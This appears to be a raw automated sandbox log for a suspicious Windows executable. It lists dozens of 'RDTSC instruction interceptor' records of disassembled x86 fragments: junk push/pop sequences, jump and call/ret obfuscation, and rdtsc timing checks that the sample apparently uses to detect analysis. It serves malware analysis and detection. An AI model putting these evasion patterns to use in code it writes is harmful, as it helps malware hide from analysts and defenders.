Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DDB second address: CB7E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F953D015243h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F953D01523Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E0A second address: CB7E18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E18 second address: CB7E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7E1C second address: CB7EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F953D46EDA3h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F953D46ED98h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1BF5h], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F953D46ED98h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov dh, al 0x00000050 push 00000000h 0x00000052 sbb dh, FFFFFFA1h 0x00000055 push 00000003h 0x00000057 jmp 00007F953D46ED9Fh 0x0000005c push C7461971h 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jne 00007F953D46ED96h 0x0000006a pushad 0x0000006b popad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CC9B08 second address: CC9B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E66 second address: CD7E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E6C second address: CD7E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD7E76 second address: CD7EA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F953D46ED9Ch 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007F953D46EDA0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD801E second address: CD8036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D015244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8036 second address: CD803A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD803A second address: CD8044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD848D second address: CD8499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F953D46ED96h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8499 second address: CD849D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8614 second address: CD8645 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F953D46ED96h 0x00000011 jmp 00007F953D46EDA8h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8645 second address: CD864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8791 second address: CD8797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9DE33 second address: C9DE61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007F953D015243h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9DE61 second address: C9DE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8EF8 second address: CD8F18 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D015244h 0x00000008 jmp 00007F953D01523Ch 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F953D015236h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9081 second address: CD9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9087 second address: CD9090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9090 second address: CD9096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9096 second address: CD90A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F953D015236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDA5ED second address: CDA5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDA5F1 second address: CDA5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBD8D second address: CDBDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F953D46ED96h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBDA3 second address: CDBDCF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F953D015245h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d ja 00007F953D015238h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F953D015236h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBEE3 second address: CDBEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBEE8 second address: CDBEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA48CE second address: CA4901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F953D46ED9Dh 0x0000000b jmp 00007F953D46EDA7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F953D46ED96h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA4901 second address: CA490B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F953D015236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE3F32 second address: CE3F42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F953D46ED96h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE44CE second address: CE44D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F953D015236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE44D8 second address: CE44DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE44DD second address: CE4509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F953D015236h 0x0000000a jmp 00007F953D015249h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F953D015236h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE4509 second address: CE4520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE4520 second address: CE452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE465B second address: CE4670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE4670 second address: CE469C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F953D015244h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F953D015236h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE469C second address: CE46A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE46A0 second address: CE46A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE46A4 second address: CE46AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6DE9 second address: CE6DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6DF3 second address: CE6DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6DF7 second address: CE6E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6E04 second address: CE6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6E0A second address: CE6E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007F953D015236h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6E1F second address: CE6E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6FB4 second address: CE6FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6FB9 second address: CE6FCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F953D46ED98h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e je 00007F953D46ED9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE714A second address: CE714E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7393 second address: CE7397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7397 second address: CE739D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE739D second address: CE73A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F953D46ED9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE79F2 second address: CE79F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE79F6 second address: CE79FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE79FC second address: CE7A21 instructions: 0x00000000 rdtsc 0x00000002 je 00007F953D01524Bh 0x00000008 jmp 00007F953D015245h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7A21 second address: CE7A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7A25 second address: CE7A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7AA1 second address: CE7AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F953D46ED96h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7D58 second address: CE7D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7D5E second address: CE7D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F953D46EDA7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7E50 second address: CE7E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7E54 second address: CE7E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7E5F second address: CE7E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE7FF4 second address: CE800C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE8097 second address: CE809D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE809D second address: CE80AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE8671 second address: CE871B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015248h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F953D015238h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 pushad 0x00000029 mov al, ch 0x0000002b popad 0x0000002c mov dword ptr [ebp+122D3158h], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F953D015238h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e adc edi, 179844B9h 0x00000054 xchg eax, ebx 0x00000055 js 00007F953D015249h 0x0000005b jmp 00007F953D015243h 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F953D015241h 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CECB54 second address: CECB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CEF3C1 second address: CEF3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CEDECC second address: CEDEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA3h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46EDA5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF1806 second address: CF180A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF180A second address: CF1810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF1810 second address: CF1879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, si 0x0000000f push 00000000h 0x00000011 call 00007F953D015246h 0x00000016 mov dword ptr [ebp+122D190Ch], eax 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+124743E8h], eax 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jmp 00007F953D015249h 0x0000002c je 00007F953D01523Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF1879 second address: CF1884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF1884 second address: CF188E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF188E second address: CF1892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF480F second address: CF4813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF4813 second address: CF4836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F953D46EDA8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF3ABE second address: CF3AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF4836 second address: CF48B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F953D46ED96h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 movsx edi, dx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F953D46ED98h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov bh, cl 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F953D46ED98h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f jmp 00007F953D46EDA7h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pushad 0x00000059 popad 0x0000005a pop edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF48B4 second address: CF48BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F953D01523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF4A1D second address: CF4A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF4ADC second address: CF4AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
